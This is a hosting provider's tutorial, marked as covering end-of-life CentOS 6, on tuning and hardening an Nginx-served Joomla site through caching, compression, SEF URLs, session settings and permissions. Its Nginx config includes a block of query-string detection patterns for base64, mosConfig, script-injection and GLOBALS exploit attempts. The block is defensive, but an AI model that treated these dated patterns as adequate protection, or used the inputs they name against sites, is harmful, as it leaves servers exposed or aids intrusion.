Status: This OS is no longer supported
This article, “Optimize your CentOS 6 VPS Nginx-powered Joomla Installation,” covers a version of CentOS that reached end of life (EOL). It is no longer supported. As such, this guide is no longer maintained. If you are currently operating a server running CentOS 6, we highly recommend contacting RoseHosting’s fully managed support. They can upgrade or migrate you to a supported version of AlmaLinux.
As promised, in this sequel to my previous post, we’ll see some useful steps for performance and security optimization of your Nginx-powered Joomla installation on a CentOS VPS and get it ready for its production run. Please note that these are not one-time and/or persistent settings. Performance and security optimization is a constant process.
So, the first thing I do after every Joomla installation is to hide its version, since it’s known that attackers usually scan for the Joomla version so they can track and explore its vulnerabilities.
Table of Contents
Show Joomla Version
To hide the Joomla version:
1. Log in to the Admin panel, go to System > Global Configuration, scroll all the way down, and find the Show Joomla! Version option. Set it to No.
- Compress it! With the gzip option enabled, the web server is being told to compress the content of the main website before it sends it to the browser. While this option can reduce the file size by a nice percentage (usually more than 70%), as well as the time necessary for the content to be sent to the browser, it also assigns a greater deal of the effort to the web server itself.
Page Compression
After the calculations are done, this exchange of duties works for the benefit of the website and its speed, so its usage is recommended. To do so:
2. Go to System > Global Configuration > Server tab. ind the Gzip Page Compression option and set it to Yes.
- Cache it! Use this option to boost performance after the development phase is over and the website is ready to go live. Recommended initial cache time is 60 minutes.
Joomla offers two caching options, conservative and progressive. Strong recommendations favor conservative caching. In short:
– If conservative caching is enabled, then for every visitor that comes to the website, Joomla will check for a cached version in its cache directory, and if the cached version exists, Joomla will serve it to the client. If the cached version does not exist, Joomla will create one and then serve it to the client. The cached version stays there as defined by Cache Time (in minutes).
– if progressive caching is enabled, then for every visitor that comes to the website, Joomla will check for a cached version for that specific client, and if it exists it will serve it, but if not, Joomla will create cached version of the website specifically for that client in its cache directory and then will serve the client. So, if another, new client goes to visit the website (for the first time), Joomla will completely disregard that cached version of the website for the previous client, and it will create new one, for the current client, which makes this caching mode even worse (performance-wise) than the Caching Disabled option, since it offers performance boost for the returning clients only. So, unless you are certain you need this option, its usage is not recommended. However, to choose your favorite setting:
Caching
3. Go to System > Global Configuration > System tab and find the Cache option in the Cache Settings section and set it to the desired value based on the previous explanations. Set the time to 60, unless you know you need another number. Use File as Cache Handler or any other available software.
Next, you would like to adjust the Session Lifetime. This, in general, depends on your own (and your users’) needs. You can set this option to a more paranoid state by inserting a lower number (the value is in minutes). The default value is 15, which means that the user will be automatically logged out after 15 minutes of inactivity. The default—and recommended—handler is the database, as setting the handler to none can break most of Joomla’s functions.
Edit Session Values
So, to edit the Session values:
4. Go to System > Global Configuration > System tab and find the Session Lifetime option in the Session Settings section and set it to the desired value based on the previous explanations. If you are unsure which number is correct for you, simply leave it at its default value.
- SEF it! It is strongly recommended that you enable SEF, also known as Search Engine Friendly URLs. The difference between a website with and without SEF is quite obvious. If SEF is disabled, the URLs would look like:
http://joomla.rosehosting.com/index.php?option=com_content&view=article&id=1:test-article&catid=8&Itemid=101
Otherwise:
http://joomla.rosehosting.com/index.php/8-test/1-test-article
The steps:
5. If you followed my previous article, you already have the necessary Nginx config line in place, so you just need to go to System > Global Configuration > Site tab > SEO Settings section and set Search Engine Friendly URLs to Yes. Also, make sure System – SEF plugin is enabled in Extensions > Plugin Manager.
If you haven’t followed our previous article, then you need to edit your Nginx vhost file and make sure the following line is in place:
# vim /etc/nginx/sites-enabled/mydomain.tld.conf
location / {
try_files $uri $uri/ /index.php?$args;
}
Save the file and restart Nginx:
# service nginx restart
Rewrite the URL
In order to ‘decorate’ our URLs even more, we need to enable the Use URL Rewriting option that can be found right below the Search Engine Friendly URLs option that we have just enabled. Now the URL should look like:
http://joomla.rosehosting.com/8-test/1-test-article
Another good idea is to protect your Joomla installation from some of the most common known exploits. To do so, make sure the following lines are in place:
# vim /etc/nginx/sites-enabled/mydomain.tld.conf
location / {
try_files $uri $uri/ /index.php?$args;
if ($query_string ~ "base64_encode.*(.*)"){ return 403; }
if ($query_string ~ "sbp(=|%20|%3D)"){ return 403; }
if ($query_string ~ "sb_authorname(=|%20|%3D)"){ return 403; }
if ($query_string ~ "mosConfig_[a-zA-Z_]{1,21}(=|%3D)"){ return 403; }
if ($query_string ~* "(<|%3C).*script.*(>|%3E)"){ return 403; }
if ($query_string ~ "GLOBALS(=|[|%[0-9A-Z]{0,2})"){ return 403; }
if ($query_string ~ "_REQUEST(=|[|%[0-9A-Z]{0,2})"){ return 403; }
}
Save the file and restart Nginx:
# service nginx restart
These are some of the optimization and security protective measures you can take to secure and optimize your Joomla installation. Of course, there is no such thing as perfect safety, so feel free to play with and test your Joomla and secure it even more if this doesn’t seem enough. However, don’t forget to keep your Joomla installation and its plugins/extensions up-to-date by upgrading whenever a new version comes out, and uninstall (don’t just disable) unnecessary extensions.
Also, make sure you have the correct file and directory permissions. All of the files need a 644 permission, while the directories should have 755 (unless you are 100% sure what you are doing).
Conclusion
Now you have optimized and secured a Joomla installation on your CentOS 6 VPS, ready to go into production.
Of course, if you are one of our Linux VPS Hosting customers, you don’t have to do any of this; simply ask our admins, sit back, and relax. Our admins will set this up for you immediately.
PS. If you liked this post, please share it with your friends on the social networks using the buttons on the left or simply leave a reply below. Thanks.